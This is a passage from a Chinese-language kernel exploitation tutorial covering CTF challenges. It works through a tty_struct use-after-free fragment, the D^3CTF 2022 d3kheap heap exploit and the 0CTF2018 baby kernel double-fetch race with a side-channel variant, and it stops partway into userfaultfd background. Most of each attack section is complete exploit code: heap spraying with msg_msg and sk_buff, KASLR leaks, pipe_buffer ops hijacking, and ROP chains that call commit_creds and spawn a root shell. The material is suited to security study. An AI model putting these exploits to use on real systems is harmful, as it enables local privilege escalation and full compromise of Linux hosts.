size_t tty_struct_padding[0x10] = {0};

int p = 0;
rop[p++] = pop_rdi;
rop[p++] = 0x6f0;
rop[p++] = mov_rc4_rdi_pop_rbp;
rop[p++] =((size_t)&rop&(~0xfff));
rop[p++] = getRootPrivilige;
rop[p++] = swapgs_pop_rbp;
rop[p++] = ((size_t)&rop&(~0xfff));
rop[p++] = iretq;
rop[p++] = get_shell;
rop[p++] = user_cs;
rop[p++] = user_rflags;
rop[p++] = user_sp;
rop[p++] = user_cs;


for(i = 0; i < 0x10; i++){
fake_tty_operations[i] = mov_rsp_rax_ret;
}
fake_tty_operations[0] = pop_rax_ret;
fake_tty_operations[1] = rop;
int fd1 = open("/dev/babydev", 2);
int fd2 = open("/dev/babydev", 2);

ioctl(fd1, 0x10001, 0x2e0);
close(fd1);
//alloc the UAF chunk to tty_struct
int fd3 = open("/dev/ptmx", 2);

//overwrite the tty_struct->ops
read(fd2, tty_struct_padding, 0x30);
tty_struct_padding[3] = fake_tty_operations;
write(fd2, tty_struct_padding, 0x30);
write(fd3, buff, 0x10);

}

例题:D^3CTF - kheap

1. 题目逆向

首先查看其中运行脚本

开启smep、smap、kaslr、pti,双核双线程、monitor置为null

然后我们再查看出题者贴心的提供给我们的内核配置信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# D3CTF2022 - d3kheap

baby heap in kernel space, just sign me in plz :)

Here are some kernel config options you may need

```
CONFIG_STATIC_USERMODEHELPER=y
CONFIG_STATIC_USERMODEHELPER_PATH=""
CONFIG_SLUB=y
CONFIG_SLAB_FREELIST_RANDOM=y
CONFIG_SLAB_FREELIST_HARDENED=y
CONFIG_HARDENED_USERCOPY=y
```

我们发现其中开启了

1
2
CONFIG_SLAB_FREELIST_RANDOM=y
CONFIG_SLAB_FREELIST_HARDENED=y

其中一个时freelist指针对特定值的异或还有其中分布的随机化

这一手配置,风雨不透啊

然后我们通过文件系统的init脚本可以得知插入了一个d3kheap.ko驱动模块,此时我们基本可以判定漏洞出自于他,接下来咱们继续分析

题目给出的漏洞十分简洁,a3师傅本意是为了使得大家更加专注于漏洞利用,而不是纯粹的逆向代码分析,这点倒是同用户态相反

我们可以通过ioctl来申请一个1k的块,然后我们有着两次kfree的机会,且存在UAF,那么就是这样一个十分明显的漏洞,我们的重心得以转到如何去利用它这点

2.socketpair基础知识

该系统调用通常被用来进行Linux网络编程,个人感觉有点类似于进程间通信的pipe,同样都是进行通信,但是socketpair支持全双工通信

他的使用也同pipe类似,通过传入一个大小为2的数组来分别作为读写fd指针,其调用如下:

1
2
3
4
5
SYSCALL_DEFINE4(socketpair, int, family, int, type, int, protocol,
int __user *, usockvec)
{
return __sys_socketpair(family, type, protocol, usockvec);
}

这里仅仅给出系统调用的声明部分

3.sk_buff基础知识

他被多次应用于网络消息传递的过程中,其中在我们读写上面的socketpair的时候同样会用到,我们来查看一下他的结构体内容,也由于太长我就不放太多

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
struct sk_buff {
union {
struct {
/* These two members must be first. */
struct sk_buff *next;
struct sk_buff *prev;

union {
struct net_device *dev;
/* Some protocols might use this space to store information,
* while device pointer would be NULL.
* UDP receive path is one user.
*/
unsigned long dev_scratch;
};
};
struct rb_node rbnode; /* used in netem, ip4 defrag, and tcp stack */
struct list_head list;
};


/* These elements must be at the end, see alloc_skb() for details. */
sk_buff_data_t tail;
sk_buff_data_t end;
unsigned char *head,
*data;
unsigned int truesize;
refcount_t users;

#ifdef CONFIG_SKB_EXTENSIONS
/* only useable after checking ->active_extensions != 0 */
struct skb_ext *extensions;
#endif
};
  • next:用作同其他sk_buff进行链接,就如同msg_msg一样类似
  • prev:同上
  • tail:指向数据区中实际数据结束的地方
  • end:指向数据区中结束的地方(这里是非实际的,具体在下面讲解)
  • head:指向数据区中开始的地方(非实际)
  • data:指向数据区中实际数据开始的地方

当我们利用上面的系统调用进行write的时候,也就是发送包的过程,就会调用其中的一个函数 alloc_skb

1
2
3
4
5
6
7
8
9
10
11
12
/**
* alloc_skb - allocate a network buffer
* @size: size to allocate
* @priority: allocation mask
*
* This function is a convenient wrapper around __alloc_skb().
*/
static inline struct sk_buff *alloc_skb(unsigned int size,
gfp_t priority)
{
return __alloc_skb(size, priority, 0, NUMA_NO_NODE);
}

这里主要是调用 __alloc_skb,我们继续查看

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
/* 	Allocate a new skbuff. We do this ourselves so we can fill in a few
* 'private' fields and also do memory statistics to find all the
* [BEEP] leaks.
*
*/

/**
* __alloc_skb - allocate a network buffer
* @size: size to allocate
* @gfp_mask: allocation mask
* @flags: If SKB_ALLOC_FCLONE is set, allocate from fclone cache
* instead of head cache and allocate a cloned (child) skb.
* If SKB_ALLOC_RX is set, __GFP_MEMALLOC will be used for
* allocations in case the data is required for writeback
* @node: numa node to allocate memory on
*
* Allocate a new &sk_buff. The returned buffer has no headroom and a
* tail room of at least size bytes. The object has a reference count
* of one. The return is the buffer. On a failure the return is %NULL.
*
* Buffers may only be allocated from interrupts using a @gfp_mask of
* %GFP_ATOMIC.
*/
struct sk_buff *__alloc_skb(unsigned int size, gfp_t gfp_mask,
int flags, int node)
{
struct kmem_cache *cache;
struct sk_buff *skb;
u8 *data;
bool pfmemalloc;

cache = (flags & SKB_ALLOC_FCLONE)
? skbuff_fclone_cache : skbuff_head_cache;

...

else
skb = kmem_cache_alloc_node(cache, gfp_mask & ~GFP_DMA, node);
if (unlikely(!skb))
return NULL;
prefetchw(skb);

/* We do our best to align skb_shared_info on a separate cache
* line. It usually works because kmalloc(X > SMP_CACHE_BYTES) gives
* aligned memory blocks, unless SLUB/SLAB debug is enabled.
* Both skb->head and skb_shared_info are cache line aligned.
*/
size = SKB_DATA_ALIGN(size);
size += SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
data = kmalloc_reserve(size, gfp_mask, node, &pfmemalloc);
...
}

我们重点关注以上代码,我们知道当我们分配这个 struct sk_buff结构体的时候,他会从自带的cache当中分配,但是当我们分配数据部分的时候,他会调用 kmalloc_reserve进行分配,该函数则会从通用的kmem_cache当中申请,这里他的大小会首先进行对齐然后加上一个 struct skb_shared_info大小的结构体,然后再进行分配,该结构体大小为320字节

所以我们的一个大致 sk_buff + data的分配情况如下:

而当我们释放的时候只需要调用read读取相应通道包即可。

4.漏洞利用

我们首先可以利用题目中的ioctl来分配一个1k大小的空间,然后直接释放他了再接着分配一个大小为 1k的 msg_msg结构体,他就作为本次题目当中的 victim,但是经过测试在释放过后紧接着分配0x400的msg_msg并不能立刻获取刚刚free掉的kheap块,这一点我在最开始思考的时候也很不解,然后发现有师傅已经提前问了这个问题,据出题者a3师傅所言

而我考虑到本题环境是双核双线程,所以我又在启动脚本改为单核单线程后尝试仍然不能立刻分配,这里还存在一定疑问:(

所以由于我们现在并不能知道 哪个msg_queue中的 msg_msg分配到了刚刚free掉的堆块,所以我们需要堆喷 msg_queue,然后再设法找到其中的 victim_msg_queue

这里我们利用到 CVE-2021-22555的思路,构造一个主从 msg_msg,如下:

我们在每个 msg_queue链条上面分配出一个主msg_msg(96)和一个从msg_msg(0x400,同体中所给kheap在同一kmem_cache当中取),这里构造成这样是为了之后能通过他读取 victim msg_msg's addr

然后我们再一次用掉题目中所给出的free机会,我们利用刚刚讲到的 sk_buff,堆喷 sk_buff来试图分配到之前释放掉的kheap,但是此时上面仍存在着msg_msg,因此我们可以填入虚假信息,然后读取每一个 msg_msg,如果读取失败则说明找到了对应的 victim msg_msg

当我们找到了对应堆块后,我们可以修改他的 m_ts来造成越界读,我们此时可以读取该 msg_msg相邻的 msg_msg,这里相邻是因为之前我们进行了大量的堆喷,所以这里基本上是存在着相邻情况,当然不排除小概率情形。

首先我们需要知道每个 msg_queue中,msg_msg之间以及头都是靠着双链表进行链接的,也就是 struct msg_msg->list_head->*相连

所以我们可以越界读相邻从 msg_msg的prev指针,该指针指向的是该相邻主 msg_msg的所在的地方,因此我们之后再将 victim msg_msg->next指针修改成他,这样我们就可以成功泄露出相邻从 msg_msg的首地址,然后我们将其首地址减去0x400就得到了我们的 victim msg_msg的地址

知道了我们 victim msg_msg的虚拟地址之后,我们考虑再使用一个结构体,那就是较为流行的 pipe_buffer,该结构体默认首先分配一个大小为0x400的 pipe_buffers数组,而 struct pipe_buffer上又存在着内核基地址,因此我们可以泄露他并且修改 pipe_buffer->ops函数表,因为我们目前掌握着一个内核堆地址并且可以通过不断释放和堆喷 sk_buff来修改他,所以我们可以很容易的伪造这个函数表,当我们关闭管道两端,他就会调用 pipe_buffer->ops->release函数,我们就可以按照正常ROP来完成提权

最终exp如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
define _GNU_SOURCE 
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <linux/mount.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <sys/ioctl.h>

#define SK_QUEUE_NR 0x10
#define SK_BUFF_NR 0x80
#define MSG_QUEUE_NR 4096
#define MSG_TAG 0xDEADBEEF
#define PIPE_SPRAY_NR 0x80

#define MASTER_MSG_SZ 96
#define MASTER_MSG_TYPE 0x41
#define SERVANT_MSG_SZ 0x400
#define SERVANT_MSG_TYPE 0x42
#define VICTIM_MSG_TYPE 0xC0DE

#define ALLOC_FLAG 0x1234
#define FREE_FLAG 0xDEAD

#define ANON_PIPE_BUF_OPS 0xffffffff8203fe40
#define INIT_CRED 0xffffffff82c6d580
#define PUSH_RSI_POP_RSP_POP4_RET 0xffffffff812dbede
#define POP_RDI_RET 0xffffffff810938f0
#define COMMIT_CREDS 0xffffffff810d25c0
#define SWAPGS_RESTORE_REGS_AND_RETRUN_TO_USERMODE 0xffffffff81c00ff0

char fake_servant_msg[704]; /* sk_buff need include a tail, so the size(1024 - 320) should be set for the buff */
int dev_fd; /* using by filesystem */

struct msg_msg{
void* m_next;
void* m_prev;
long m_type;
size_t m_ts;
size_t next;
size_t security;
};

struct msg_msgseg{
size_t *next;
};

struct
{
long mtype;
char mtext[SERVANT_MSG_SZ - sizeof(struct msg_msg)];
}servant_msg;

struct
{
long mtype;
char mtext[MASTER_MSG_SZ - sizeof(struct msg_msg)];
}master_msg;

struct
{
long mtype;
char mtext[0x2000 - sizeof(struct msg_msg) - sizeof(struct msg_msgseg)];
}oob_msg;

struct pipe_buffer {
size_t page;
unsigned int offset, len;
size_t ops;
unsigned int flags;
unsigned long private;
};

struct pipe_buf_operations{
size_t confirm;
size_t release;
size_t try_steal;
size_t get;
};

/* to run the exp on the specific core only */
void bind_cpu(int core)
{
cpu_set_t cpu_set;
CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
}

/*
* save the process current context
* */
size_t user_cs, user_ss,user_rflags,user_sp;

void saveStatus(){
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
puts("\033[34m\033[1m Status has been saved . \033[0m");
}



#define PRINT_ADDR(str, x) printf("\033[0m\033[1;34m[+]%s \033[0m:0x%lx\n", str, x)

void info_log(char* str){
printf("\033[0m\033[32m[+]%s\033[0m\n",str);
}

void error_log(char* str){
printf("\033[0m\033[1;31m[-]%s\033[0m\n",str);
exit(1);
}

long get_msg(void){
return msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
}

long send_msg(int msqid, void* msgp, size_t msgsz, long msgtyp){
((struct msgbuf *)msgp)->mtype = msgtyp;
return msgsnd(msqid, msgp, msgsz - sizeof(long), 0);
}

long recv_msg(int msqid, void* msgp, size_t msgsz, long msgtyp){
return msgrcv(msqid, msgp, msgsz - sizeof(long), msgtyp, 0);
}

long copy_msg(int msqid, void* msgp, size_t msgsz, long msgtyp){
return msgrcv(msqid, msgp, msgsz - sizeof(long), msgtyp, IPC_NOWAIT | MSG_COPY | MSG_NOERROR);
}


void alloc(){
ioctl(dev_fd, ALLOC_FLAG, 0);
}

void delete(){
ioctl(dev_fd, FREE_FLAG, 0);
}

void spray_skb(int skb_queue[SK_QUEUE_NR][2], void *buffer, size_t size){
for(int i = 0; i < SK_QUEUE_NR; i++){
for(int j = 0; j < SK_BUFF_NR; j++){
if(write(skb_queue[i][0], buffer, size) < 0){
error_log("Spraying sk_buff failed!");
}
}
}
}

void free_skb(int skb_queue[SK_QUEUE_NR][2], void *buffer, size_t size){
for(int i= 0; i < SK_QUEUE_NR; i++){
for(int j = 0; j < SK_BUFF_NR; j++){
if(read(skb_queue[i][1], buffer, size) < 0){
error_log("Free sk_buff failed!");
}
}
}
}

void build_msg(struct msg_msg* builded_msg, void* m_next, void* m_prev, long mtype, size_t m_ts, size_t next){
builded_msg->m_next = m_next;
builded_msg->m_prev = m_prev;
builded_msg->m_type = mtype;
builded_msg->m_ts = m_ts;
builded_msg->next = next;
builded_msg->security = 0;
}

void get_rootshell(){
if(getuid()){
error_log("Priviledge elevation failed!");
}
system("/bin/sh");
exit(0);
}

void main(){
int skb_queue[SK_QUEUE_NR][2];
int msg_queue[MSG_QUEUE_NR];
int pipe_fd[PIPE_SPRAY_NR][2];
int victim_qidx = -1;
size_t victim_addr;
struct msg_msg nearby_msg, nearby_master_msg;
struct pipe_buffer *pipe_buffer_ptr;
size_t *ROPchain;
size_t ropchain_idx;
struct pipe_buf_operations *ops_ptr;

size_t kernel_base, page_offset_base, kernel_offset, guess_page_offset;

info_log("Step I:Preserve the process context and bind one core... ");
bind_cpu(0);
saveStatus();

info_log("Step II:Spray the sk_queue and msg_queue...");
for(int i = 0; i < SK_QUEUE_NR; i++){
if(socketpair(AF_UNIX, SOCK_STREAM, 0, skb_queue[i]) < 0){
error_log("Allocate the socket_queue failed!");
}
}
for(int i = 0; i < MSG_QUEUE_NR; i++){
if((msg_queue[i] = get_msg()) < 0){
error_log("Allocate the msg_queue failed!");
}
}
dev_fd = open("/dev/d3kheap", O_RDONLY);
alloc();

info_log("Step III:Construct the UAF...");
memset(&master_msg, 0, sizeof(master_msg));
memset(&servant_msg, 0, sizeof(servant_msg));
for(int i = 0; i < MSG_QUEUE_NR; i++){
/* Allocate the master msg_msg */
*(int *)&master_msg.mtext[0] = MSG_TAG;
*(int *)&master_msg.mtext[4] = i;
if(send_msg(msg_queue[i], &master_msg, sizeof(master_msg), MASTER_MSG_TYPE) < 0){
error_log("Allocate the master msg_msg failed!");
}
/* Allocate the servant msg_msg */
*(int *)&servant_msg.mtext[0] = MSG_TAG;
*(int *)&servant_msg.mtext[4] = i;
if(send_msg(msg_queue[i], &servant_msg, sizeof(servant_msg), SERVANT_MSG_TYPE) < 0){
error_log("Allocate the servant msg_msg failed!");
}
/* First free the d3kheap object */
if(i == 1024)
delete();
}

info_log("Step IV:Search for the UAF msg_msg...");
/* Second free the d3kheap object */
delete();
build_msg((struct msg_msg *)fake_servant_msg, (void *)"peiwithhao", (void*)"peiwithhao", *(long *)"peiwithhao", SERVANT_MSG_SZ, 0);
spray_skb(skb_queue, (void *)fake_servant_msg, sizeof(fake_servant_msg));
for(int i = 0; i < MSG_QUEUE_NR; i++){
if(copy_msg(msg_queue[i], &servant_msg, sizeof(servant_msg), 1) < 0){
victim_qidx = i;
break;
}
}
if(victim_qidx == -1){
error_log("You have not found the victim msg_msg queue idx:(...");
}
printf("[+]the victim msg_msg idx is :%d\n", victim_qidx);
free_skb(skb_queue, (void *)fake_servant_msg, sizeof(fake_servant_msg));

info_log("Step V:Overread the victim msg_msg's nearby servant msg_msg");
build_msg((struct msg_msg *)fake_servant_msg, (void *)"peiwithhao", (void *)"peiwithhao", VICTIM_MSG_TYPE, 0x1000 - sizeof(struct msg_msg), 0);
spray_skb(skb_queue, (void *)fake_servant_msg, sizeof(fake_servant_msg));
/* We could oob read the next nearby servant msg_msg */
if(copy_msg(msg_queue[victim_qidx], &oob_msg, sizeof(oob_msg), 1) < 0){
error_log("OOB read failed!");
}
/*
* check the memory
*
for(int i = 0; i < 0x10; i++){
printf("[--- memory dump ---](%2d)0x%x\n", i, *(int *)&oob_msg.mtext[0x400 + i*4]);
}
*/
if(*(int *)&oob_msg.mtext[0x400] != MSG_TAG){
error_log("Unfortunatally! The nearby object had already been occupied!");
}
nearby_msg = *(struct msg_msg*)&oob_msg.mtext[SERVANT_MSG_SZ - sizeof(struct msg_msg)];
guess_page_offset = (size_t)(nearby_msg.m_next)&(0xfffffffff0000000);
PRINT_ADDR("guess page_offset_base", guess_page_offset);

/*
* Find the victim msg_msg addr
* */
info_log("Step VI:Get the victim msg_msg addr through nearby servant msg_msg...");
free_skb(skb_queue, (void *)fake_servant_msg, sizeof(fake_servant_msg));
build_msg((struct msg_msg *)fake_servant_msg, (void *)"peiwithhao", (void *)"peiwithhao", VICTIM_MSG_TYPE, sizeof(oob_msg.mtext), (size_t)(nearby_msg.m_prev) - 8);
spray_skb(skb_queue, (void *)fake_servant_msg, sizeof(fake_servant_msg));
if(copy_msg(msg_queue[victim_qidx], &oob_msg, sizeof(oob_msg), 1) < 0){
error_log("Cannot find the nearby master msg_msg...");
}
if(*(int *)&oob_msg.mtext[0x1000] != MSG_TAG){
error_log("Unfortunatally! The nearby object had already been occupied!");
}
nearby_master_msg = *(struct msg_msg*)&oob_msg.mtext[0x1000 - sizeof(struct msg_msg)];
PRINT_ADDR("nearby msg_msg addr", (size_t)nearby_master_msg.m_next);
victim_addr = (size_t)nearby_master_msg.m_next - 0x400;
PRINT_ADDR("victim_addr", victim_addr);

/*
* Construct the UAF sk_buff
* */
info_log("Step VII:Fix the msg_msg and free it, so we get the uaf sk_buff...");
memset(&fake_servant_msg, 0, sizeof(fake_servant_msg));
free_skb(skb_queue, (void *)fake_servant_msg, sizeof(fake_servant_msg));
build_msg((struct msg_msg*)fake_servant_msg, (void *)victim_addr + 0x800 , (void *)victim_addr + 0x800, VICTIM_MSG_TYPE, SERVANT_MSG_TYPE - sizeof(struct msg_msg), 0);
spray_skb(skb_queue, (void *)fake_servant_msg, sizeof(fake_servant_msg));
if(recv_msg(msg_queue[victim_qidx], &servant_msg, sizeof(servant_msg), VICTIM_MSG_TYPE) < 0){
error_log("unlink the victim servant msg_msg failed!");
}

info_log("Step VIII:Make the pipe_buf with sk_buff in victim 1k object...");
for(int i = 0; i < PIPE_SPRAY_NR; i ++){
if(pipe(pipe_fd[i]) < 0){
error_log("Allocate the pipe failed!");
}
if(write(pipe_fd[i][1], "peiwithhao", 10) < 0){
error_log("Write to the pipe failed!");
}
}
pipe_buffer_ptr = (struct pipe_buffer *)&fake_servant_msg;
for(int i= 0; i < SK_QUEUE_NR; i++){
for(int j = 0; j < SK_BUFF_NR; j++){
if(read(skb_queue[i][1], &fake_servant_msg, sizeof(fake_servant_msg)) < 0){
error_log("Free sk_buff failed!");
}
if(pipe_buffer_ptr->ops > 0xffffffff81000000){
kernel_offset = pipe_buffer_ptr->ops - ANON_PIPE_BUF_OPS;
kernel_base = 0xffffffff81000000 + kernel_offset;
}
}
}
PRINT_ADDR("kernel_base", kernel_base);
PRINT_ADDR("kernel_offset", kernel_offset);

info_log("Step IX:Hijack the pipe_buffer->ops->release...");
pipe_buffer_ptr = (struct pipe_buffer *)&fake_servant_msg;
pipe_buffer_ptr->page = *(size_t *)"peiwithhao";
pipe_buffer_ptr->ops = victim_addr + 0x100;

ops_ptr = (struct pipe_buf_operations *)&fake_servant_msg[0x100];
ops_ptr->release = PUSH_RSI_POP_RSP_POP4_RET + kernel_offset;

ROPchain = (size_t *)&fake_servant_msg[0x20];
ropchain_idx = 0;
ROPchain[ropchain_idx++] = POP_RDI_RET + kernel_offset;
ROPchain[ropchain_idx++] = INIT_CRED + kernel_offset;
ROPchain[ropchain_idx++] = COMMIT_CREDS + kernel_offset;
ROPchain[ropchain_idx++] = SWAPGS_RESTORE_REGS_AND_RETRUN_TO_USERMODE + 22 + kernel_offset;
ROPchain[ropchain_idx++] = 0xdeadbeef;
ROPchain[ropchain_idx++] = 0xbeefdead;
ROPchain[ropchain_idx++] = (size_t)get_rootshell;
ROPchain[ropchain_idx++] = user_cs;
ROPchain[ropchain_idx++] = user_rflags;
ROPchain[ropchain_idx++] = user_sp + 8;
ROPchain[ropchain_idx++] = user_ss;

spray_skb(skb_queue, fake_servant_msg, sizeof(fake_servant_msg));
for(int i = 0; i < PIPE_SPRAY_NR; i++){
close(pipe_fd[i][0]);
close(pipe_fd[i][1]);
}

}

四、Race Condition条件竞争

大伙应该都听过这个名字,也就是利用了如今计算机领域常见的同步和互斥导致问题来进行攻击

例题:0CTF2018 Final - baby kernel

整个模块就实现了ioctl,如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
__int64 __fastcall baby_ioctl(__int64 a1, __int64 a2)
{
__int64 v2; // rdx
int i; // [rsp-5Ch] [rbp-5Ch]
__int64 v5; // [rsp-58h] [rbp-58h]

_fentry__(a1, a2);
v5 = v2;
if ( a2 == 0x6666 )
{
printk("Your flag is at %px! But I don't think you know it's content\n", flag);
return 0LL;
}
else if ( a2 == 0x1337
&& !_chk_range_not_ok(v2, 16LL, *(__readgsqword(&current_task) + 0x1358))// check1:检查传递结构体的范围是否小于0x7ffff...
&& !_chk_range_not_ok(*v5, *(v5 + 8), *(__readgsqword(&current_task) + 0x1358))// check2:检查结构体内容的范围是否小于0x7ffff...
&& *(v5 + 8) == strlen(flag) ) // check3:检查长度是否等于flag
{
for ( i = 0; i < strlen(flag); ++i )
{
if ( *(*v5 + i) != flag[i] )
return 22LL;
}
printk("Looks like the flag is not a secret anymore. So here is it %s\n", flag);
return 0LL;
}
else
{
return 14LL;
}
}

这里可以看到他是首先给出了flag的地址,然后再与我们传入的数据结构进行比较,其中有三个check

  1. 检查我们的传入数据结构是否位于用户态(这里的(&current_task)+0x1358的值是可以通过动调知道)
  2. 检查我们传入数据结构指向的块是否位于用户态
  3. 检查指向块的长度是否位于用户态

检查完毕后再来查看我们传入的块里面的数据是否等于flag值,如果等于则打印在内核输出当中
下面就是本次讲解的例题手法

1.double fetch

这里的doube fetch就是两次取的意思,我们可以知道,在内核检测数据的过程中,以及到达开始比较的过程当中,这一段缝隙对于人来说可能是十分短且可以忽略的地方,而对于程序来说那就不是这样了,我们可以充分利用这段间隙,在该地址通过检测的情况下再立刻修改他指向的值,这样就可以绕过检测,这里给出a3师傅的图

这里值得注意的一点就是再我们使用pthread函数簇的时候,记得编译选项加上-lpthread
我们的exp如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <ctype.h>
#include <sys/mman.h>
#include <string.h>
#include <sched.h>
#include <stdio.h>
#include <pthread.h>
#include <sys/types.h>
#include <string.h>


#define PRINT_ADDR(str, x) printf("\033[0m\033[1;34m[+]%s \033[0m:%p\n", str, x)

pthread_t compete_thread;
char buf[0x30] = "peiwithhao";
int competition_time = 0x1000, status = 1;
long long real_addr;


struct{
void* flag_addr;
size_t flag_len;
}flag = {.flag_addr = buf, .flag_len = 33};

void* competition_thread(void){
while(status){
for(int i = 0; i< competition_time ; i++){
flag.flag_addr = real_addr;
}
}
}

void info_log(char*);
void error_log(char*);

void info_log(char* str){
printf("\033[0m\033[1;32m[+]%s\033[0m\n",str);
}

void error_log(char* str){
printf("\033[0m\033[1;31m%s\033[0m\n",str);
exit(1);
}

void main(){

int fd = open("/dev/baby", 2);
ioctl(fd, 0x6666);
system("dmesg | grep flag > addr.txt");
int addr_fd = open("/addr.txt", 0);
lseek(addr_fd, 31, SEEK_SET);
char buf[0x10] = {0};
char* temp = (char*)malloc(0x1000);
buf[read(addr_fd, buf, 0x10)] = '\0';
sscanf(buf, "%lx", &real_addr);
PRINT_ADDR("flag", real_addr);

pthread_create(&compete_thread, NULL, competition_thread, NULL);
while(status){
for(int i = 0; i < competition_time ; i++){
flag.flag_addr = buf;
ioctl(fd, 0x1337, &flag);
}
system("dmesg | grep flag > result.txt");
int result_fd = open("/result.txt", 0);
read(result_fd, temp, 0x1000);
if(strstr(temp, "flag{")){
status = 0;
}

}
pthread_cancel(compete_thread);
info_log("finish");
system("dmesg | grep flag");

}

2. 侧信道

顾名思义,其就是使用一种完全偏离正常解题思路的一种攻击手段,譬如更加像物理黑客那样达成自己的目的,有的侧信道解法甚至使用到加解密判断中运行时长的差别来判断整体程序的运行。本题同样存在侧信道解法。

我们在上面都接触到,只有题目中传递到了正确的flag值我们才可以获取flag,但是就这么个检查flag的过程是一个字节一个字节检测的,所以说我们可以采用下面这个思路:

  1. 我们每次传递一定长度的flag值,并逐位进行爆破
  2. 每次判断正确的办法也很简单,如果我们传递了错误的值,程序就会正常退出,如果我们传递正确的值该怎么办呢,这里给出解答,我们可以mmap出一页范围,然后将部分flag置于页末尾,那么如果我们flag的最后一个符号匹配,程序就会接着往后面访问判断是否匹配,但是这就到了下一页,其大概率会出现访问panic

大致情况如下:

如下exp,我们可以通过传递参数的方式来猜:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <ctype.h>
#include <sys/mman.h>
#include <string.h>
#include <sched.h>
#include <stdio.h>
#include <pthread.h>
#include <sys/types.h>
#include <string.h>


#define PRINT_ADDR(str, x) printf("\033[0m\033[1;34m[+]%s \033[0m:%p\n", str, x)

pthread_t compete_thread;
char *buf;
int competition_time = 0x1000, status = 1;
long long real_addr;


struct{
void* flag_addr;
size_t flag_len;
}flag = {.flag_len = 33};

void* competition_thread(void){
while(status){
for(int i = 0; i< competition_time ; i++){
flag.flag_addr = real_addr;
}
}
}

void info_log(char*);
void error_log(char*);

void info_log(char* str){
printf("\033[0m\033[1;32m[+]%s\033[0m\n",str);
}

void error_log(char* str){
printf("\033[0m\033[1;31m%s\033[0m\n",str);
exit(1);
}

void main(int argc, char** argv){

int fd = open("/dev/baby", 2);
if(argc < 2){
error_log("Usage: ./exp <flag>");
}
int flag_len = strlen(argv[1]);
buf = (char *)mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_SHARED, -1, 0);
void* flag_addr = buf + 0x1000 - flag_len;
memcpy(flag_addr, argv[1], flag_len);
flag.flag_addr = flag_addr;
ioctl(fd, 0x1337, &flag);

}

例题:强网杯2021线上赛-notebook

1.userfaultfd基础

该类技术就是让我们用户来处理本该由内核处理的事件,其中就比如缺页异常等。
userfaultfd 机制让在用户控制缺页处理提供可能,进程可以在用户空间为自己的程序定义page fault handler,增加了灵活性,但也可能由于类似FUSE之于内核FS的问题(调用层次加深)而影响性能。

他被实现一个系统调用供我们使用,我们可以查看其帮助手册,如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
SYNOPSIS
#include <sys/types.h>
#include <linux/userfaultfd.h>

int userfaultfd(int flags);

Note: There is no glibc wrapper for this system call; see NOTES.

DESCRIPTION
userfaultfd() creates a new userfaultfd object that can be used for delegation of page-fault handling to a user-space application, and returns a file descriptor that refers to the new object. The new userfaultfd ob‐
ject is configured using ioctl(2).

Once the userfaultfd object is configured, the application can use read(2) to receive userfaultfd notifications. The reads from userfaultfd may be blocking or non-blocking, depending on the value of flags used for
the creation of the userfaultfd or subsequent calls to fcntl(2).

The following values may be bitwise ORed in flags to change the behavior of userfaultfd():

O_CLOEXEC
